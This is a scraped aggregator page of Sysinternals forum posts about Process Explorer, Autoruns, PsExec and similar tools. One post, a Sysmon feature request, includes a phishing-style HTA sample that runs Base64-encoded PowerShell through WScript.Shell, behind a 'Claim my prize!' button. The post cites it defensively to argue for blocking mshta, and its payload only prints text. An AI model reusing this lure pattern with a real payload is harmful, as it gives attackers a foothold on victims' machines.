Quantcast
Channel: Sysinternals Forums
Viewing all 10386 articles
Browse latest View live

Process Explorer : Search takes 15 minutes with no results

April 7, 2018, 12:56 pm
$
0
0
Author: Geoffrey Stuart
Subject: Search takes 15 minutes with no results
Posted: 07 April 2018 at 7:56pm

My Quicken app will not open, error says the file is in use.  

I entered the path and file name in PE to find what process had the file open, but the search took over 15 minutes and found nothing. What to try next?  And why is PE taking so long to search?
Search

Process Explorer : Select Columns

April 7, 2018, 10:47 pm
$
0
0
Author: malishich
Subject: Select Columns
Posted: 08 April 2018 at 5:47am

I suggest to add new option (check box) to "Select Columns" dialog - to show the amount of opened TCP/IP sockets for the process. Brobably it  could be amount of UDP, amount of TCP sockets.

Process Explorer : BUG: Process Explorer fails to show DLLs

April 9, 2018, 8:37 am
$
0
0
Author: Maximus5
Subject: BUG: Process Explorer fails to show DLLs
Posted: 09 April 2018 at 3:37pm

The DLLs list in Lower Pane View is completely empty. For any process (32/64 bit, elevated or not).
There are even no column headers.

It is strange, but for the same processes ProcessExplorer is able to show Handles.

Process Explorer v16.21
Windows 10 (16299.334)

Process Monitor : Detail Column

April 9, 2018, 2:14 pm
$
0
0
Author: justusiv
Subject: Detail Column
Posted: 09 April 2018 at 9:14pm

I am trying to monitor a file server that host a share. I am wondering if someone could give some insight into the detail column.

I find that the Operation "IRP_MJ_CREATE" has the data i am after but deciphering the detail column is a pain. Once i filter on that, all the filtering then needs to be done from the detail column. Lets say i want to monitor deletes. It appears in a few locations. I cant just filter on delete as i get a ton of hits. I have found two possible items from here. "Desired Access: Delete" and "Options: Delete On Close" Not sure what would be better to filter on as i am after 1 hit per deletion. In addition how do i know i wouldn't be missing some sort of other delete.

The next pain point is under these sub categories i never know what other results are going to be included so i have a hard time filtering properly. For example it could be "Desired Access: Read Attributes, Delete" or "Desired Access: Generic Read/Write, Delete". So any guidance on that would be helpful as well. It would make life easier if they were split out into there own column.


Edited by justusiv - 4 hours 35 minutes ago at 9:16pm

Internals : NtRaiseHardError in ntdll.dll

April 9, 2018, 8:28 pm
$
0
0
Author: Arush
Subject: NtRaiseHardError in ntdll.dll
Posted: 10 April 2018 at 3:28am

It seems like i can only find ZwRaiseHardError in ntdll.dll. Is there a way that I can see NtRaiseHardError?

Miscellaneous Utilities : RAMMap doesn't work in Windows insider preview

April 10, 2018, 11:30 am
$
0
0
Author: MagicAndre1981
Subject: RAMMap doesn't work in Windows insider preview
Posted: 10 April 2018 at 6:30pm

RAMMap uses unofficial API to query PFN database. This API/data structure change over the time in new Windows 10 builds. wait until Mark provides a working version for Windows 10 v1803.

Autoruns : Remove "File not Found"

April 10, 2018, 12:24 pm
$
0
0
Author: Chalek37
Subject: Remove "File not Found"
Posted: 10 April 2018 at 7:24pm

My system is working Ok.
I have found in AutoRuns about 12 instances of File not found.
If I delete those instances will I be able to note a reduction in my bootup time?
What are the potential problems?Disapprove

Malware : Gpu based paravirtualization rootkit, all os vulne

April 10, 2018, 10:42 pm
$
0
0
Author: lil_king420
Subject: Gpu based paravirtualization rootkit, all os vulne
Posted: 11 April 2018 at 5:42am

Hello again to my 'favorite' Clown thread on the interwebz. 

I have no new information really, still dealing with this 'problem' and even though I have invested many more hours into researching this, whatever it is, I don't feel any closer to an answer and cannot report any progress this time. 

I see a couple new names/posts... welcome!!! And I want to thank explicitly ALL of you who have participated in this thread.  I know how most of you feel, this sh*t makes a person truly feel as though we are crazy.  Just know you are not alone and that others are still working to expose the malicious wierdness we speak of here.

RFC Rudel's original post was over 6 years ago (incidentally I see his post is missing) but I am glad this thread remains open and unmolested by moderators... with the exception of Rudel's post... however that happened.  Anyhow, the reason I am adding another bump to this thread is below...

I wanted to add a link to an MS document that, IMHO, shows MS acknowledging that what we talk about in this thread is no figment of anyone's imagination.  I realize the article is basically an advertisement for the Win10 Secure Boot and other errant attempts to secure the windows environment but my point remains, this is MS admitting they cannot protect users...

https://docs.microsoft.com/en-us/windows/security/hardware-protection/secure-the-windows-10-boot-process

and I quote, "rootkits have the same rights as the operating system and start before it, they can completely hide themselves and other applications."

it goes on to actually define the various incarnations as follows....

Different types of rootkits load during different phases of the startup process:

  • Firmware rootkits. These kits overwrite the firmware of the PC’s basic input/output system or other hardware so the rootkit can start before Windows.
  • Bootkits. These kits replace the operating system’s bootloader (the small piece of software that starts the operating system) so that the PC loads the bootkit before the operating system.
  • Kernel rootkits. These kits replace a portion of the operating system kernel so the rootkit can start automatically when the operating system loads.
  • Driver rootkits. These kits pretend to be one of the trusted drivers that Windows uses to communicate with the PC hardware.

@Tink03 - I can speak to your permissions comment in that there absolutely are files and folders in Windows that you do not want access to, for example, the "Application Data" folder.  By default even as an administrator, you will get an access denied error.  What I have learned the hard way, is that giving yourself full control of this folder results in a redundant loop of symbolic links or junctions that, if allowed to persist will consume an entire hard drive.  The permissions of that folder require the group EVERYONE = DENIED.  A simple explanation can be found here...
https://answers.microsoft.com/en-us/windows/forum/windows_7-files/multiple-application-data-files-folders-nested/53c5439d-a33f-44da-a0ca-e94bb3e15c1f?auth=1
and a more complete explanation is here;
https://www.sevenforums.com/general-discussion/115149-stop-application-data-folder-replicating.html#post990903

This is only one example, but there are many instances where one does not want to be able to access something on there own PC.  Hopefully this helps a little.  Just be mindful of this as ignoring it can and does wreak havoc to the point of bricking a device completely.

 So til my next post, stay safe, remain vigilant, avoid speculation and do not give up. 

The answer will be found eventually! 

Knowledge is free... understand it... then share!

Search

Autoruns : Remove "File not Found"

April 11, 2018, 2:44 am
$
0
0
Author: Dax1792
Subject: Remove "File not Found"
Posted: 11 April 2018 at 9:44am

You will not notice any difference in start time. Not everything Autoruns lists runs at boot and that is too few to make a difference anyway.
 
Autoruns is not always right. You could end up with a system which does not boot. 

PsTools : Psexec - process exited with error

April 11, 2018, 7:17 am
$
0
0
Author: dexter
Subject: Psexec - process exited with error
Posted: 11 April 2018 at 2:17pm

Hello. I'm trying to remotely execute a process using psexec. Both systems are logged in as the same local account with administrator rights. When I run the command:

psexec \\SYSTEM "c:\program files\..." 

It seems to successfully connect and load pstools on the remote system but I get an error back:

c:\program files\... exited on SYSTEM with error code -1066598274

Some searching lead me to believe this error has something to do with accounts not having local administrator rights. Like I said the account I'm using is a local account that is on both systems and are in the administrator group. I've tried running as the Administrator account with the same result. 

Please help. 

Autoruns : Remove "File not Found"

April 11, 2018, 6:11 pm
$
0
0
Author: Chalek37
Subject: Remove "File not Found"
Posted: 12 April 2018 at 1:11am

Thanks for your reply. I'll leave well enough alone!Smile

Site Bugs : ACTION REQUIRED - Migration to Technet Forums

April 11, 2018, 8:04 pm
$
0
0
Author: lukim
Subject: ACTION REQUIRED - Migration to Technet Forums
Posted: 12 April 2018 at 3:04am

Additional note regarding Private Messages: *Private Messages will NOT be migrated*

If you want to keep a copy of your private messages, you will need to save/export them manually yourself.

PsTools : Psexec - process exited with error

April 13, 2018, 8:03 pm
$
0
0
Author: Aditza
Subject: Psexec - process exited with error
Posted: 14 April 2018 at 3:03am

on POSReady 2009 if you installed (as you should) the updates regularly then starting with kb4056615 it changes the way NTFS.SYS is processing the ACL rules.
https://www.catalog.update.microsoft.com/Search.aspx?q=kb4056615

this ntfs.sys change conflicts with some antivirus packages that expect a different ntfs.sys and when you try to create files you will get this error message in some folders:
"This security ID may not be assigned as the owner of this object. "
in my case the problem is with Symantec Endpoint Protection v12.1.6 MP9 - if i uninstall the antivirus then the error does not occur. Their support team in India is useless and at the end of january 2018 i gave up because their only concern was to close the ticket faster (it was 3-weeks old by that point, for a CRITICAL issue).
The problem with Symantec is still present today but i hope to dump any remaining POSReady 2009 systems by the end of the year because it becomes EOL in 2019.

in short: even if you have administrative or full access rights, if you are not the owner of the folder then you are not allowed to create new files in that folder.

the work-around solution is to take ownership of the folder where you are trying to create the files (or temporary files) because full-access or administrative rights are not enough anymore in this case.
Not even the SYSTEM account is spared from this feature/bug and a LOT of installs will fail with MSI pemissions errors.

This is also the reason why practically ALL Microsoft .NET framework patches for POSReady 2009 will fail to install on such systems - they try to use a temporary folder that is not OWNED by the SYSTEM account.
The solution for that is to use 'psexec -sdi ' and manually install the failing updates from a command-prompt that runs as SYSTEM account. Make sure to change the ntfs owner for "C:\Windows\Installer" to also be SYSTEM.

When the first setup screen appears then let it wait and go check that the permissions of the temporary folder used by the installer also have SYSTEM as the owner. This temporary folder is created by the .NET installer in the root of a random non-removable drive on the system and it will have a randomly-generated name.


Edit: hmmmm... i just saw that KB4101864 was published a few days ago... i'll have to test it next week, hopefully it fixes the owner-only file creation limitation.
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4101864

File name File version File size Date Time Platform SP requirement Service branch
Ntfs.sys 5.1.2600.7459 576,640 02-Apr-2018 23:28 x86 SP3 SP3QFE

This update replaces the following updates:
2018-01 Security Update for Windows XP Embedded SP3 for x86-based Systems (KB4056615)



Edited by Aditza - 2 hours 4 minutes ago at 5:06am

PsTools : access denied in Matlab

April 13, 2018, 10:22 pm

Miscellaneous Utilities : Sysmon Feature Request: Log Source of DCOM Calls

April 14, 2018, 10:54 am
$
0
0
Author: GregAskew
Subject: Sysmon Feature Request: Log Source of DCOM Calls
Posted: 14 April 2018 at 5:54pm

It doesn't have to be a downloaded hta. It can be in-line in an html web page or html email.

<!DOCTYPE html>
<html>
    <head>
        <HTA:APPLICATION ID="host" BORDER="thin" BORDERSTYLE="complex" maximizeButton="yes" minimizeButton="yes" scroll="no"/>
        <title>Sample</title>
    </head>
    <script for="prize" event="onClick" language="VBScript">
Dim notMal
Set notMal = CreateObject("WScript.Shell")
notMal.Run "powershell.exe       -e       VwByAGkAdABlAC0ASABvAHMAdAAgACIAUABXAE4ARQBEACIAOwAgAHIAZQBhAGQALQBoAG8AcwB0AA=="
    </script>
    <body>
        <p>
You're our millionth victim!
        </p>
        <p>
            <form>
                <input type="button" value="Claim my prize!"/>
            </form>
        </p>
    </body>
</html>

Allowing mshta.exe to run is a sure-fire way to allow adversaries a foothold in your environment.

Source:
https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
Search

Process Explorer : Procexp -> Network in mbit

April 15, 2018, 7:22 am
$
0
0
Author: bogy
Subject: Procexp -> Network in mbit
Posted: 15 April 2018 at 2:22pm

Would it be possible to show the active network traffic (the graph, next to disk, cpu, gpu, ...) in mbit per second instead of mbyte per secondN
this would make things a lot handier as all network connections are set up in mbit speeds and also data throughput is measured in mbps; only filesized or spaces (diskspace, memoryspace) is measured in mbyte.

if there is a switch (registry setting) that would be able to change this, i'd love to hear it.
If not, then please allow us to change it (if people want to keep it like it is now, please give us the opportunity to change it for ourselves; it's only a division by 8 that makes the difference.

thanks!

Process Explorer : Process launched by "Open With..." is not visible

April 15, 2018, 9:07 am
$
0
0
Author: vadimrapp
Subject: Process launched by "Open With..." is not visible
Posted: 15 April 2018 at 4:07pm

In Windows 10, if I run Wordpad from Start Menu, I see it in Process Explorer, as expected. It's also visible if I open a file for which Wordpad is the default application, by double-click. But if it's not the default application for the file, and I run it by right-clicking a .doc file,  selecting "Open With...", and selecting Wordpad, Wordpad does not show up in Process Explorer. Dragging target icon on its window results in the error message "The owning process is wordpad.exe (process ID xxxxx), which is not currently visible in the process list". Why is is it not visible?

Site Bugs : ACTION REQUIRED - Migration to Technet Forums

April 15, 2018, 11:02 am
$
0
0
Author: sitary
Subject: ACTION REQUIRED - Migration to Technet Forums
Posted: 15 April 2018 at 6:02pm

Do you know yet what forum Sysinternals will be in? Windows Tools?

Thanks,

Simon

Miscellaneous Utilities : AccessEnum showing only ???

April 15, 2018, 4:30 pm
$
0
0
Author: steve3140
Subject: AccessEnum showing only ???
Posted: 15 April 2018 at 11:30pm

I rarely visit these forums, so sorry for such a late response to your question.
 
I have noticed these ?????? files as well.  It is my belief that these are caused by a pathname+filename length which exceeds some limit, somewhere around about 250 characters approximately.
 
Usually this can therefore be fixed by renaming either folders which are somewhere in the path, or shortening the filename, or some combination of those.

Miscellaneous Utilities : AccessEnum and long pathnames

April 15, 2018, 4:36 pm
$
0
0
Author: steve3140
Subject: AccessEnum and long pathnames
Posted: 15 April 2018 at 11:36pm

I know that AccessEnum is really old, however there is a display issue when it encounters a really long pathname+filename ... the security permissions simply display as a set of question marks ???
 
Once the pathname+filename is shortened to somewhere around 240 characters or less, the permissions display correctly.
 
This in turn prompts me to suggest that some other pathname+filename length checking tool might be useful.  I have never understood why Microsoft's filesystem has these apparent limitations.  Preferably it should stop you from placing the excessively long folder+file combination in the first place.
Viewing all 10386 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>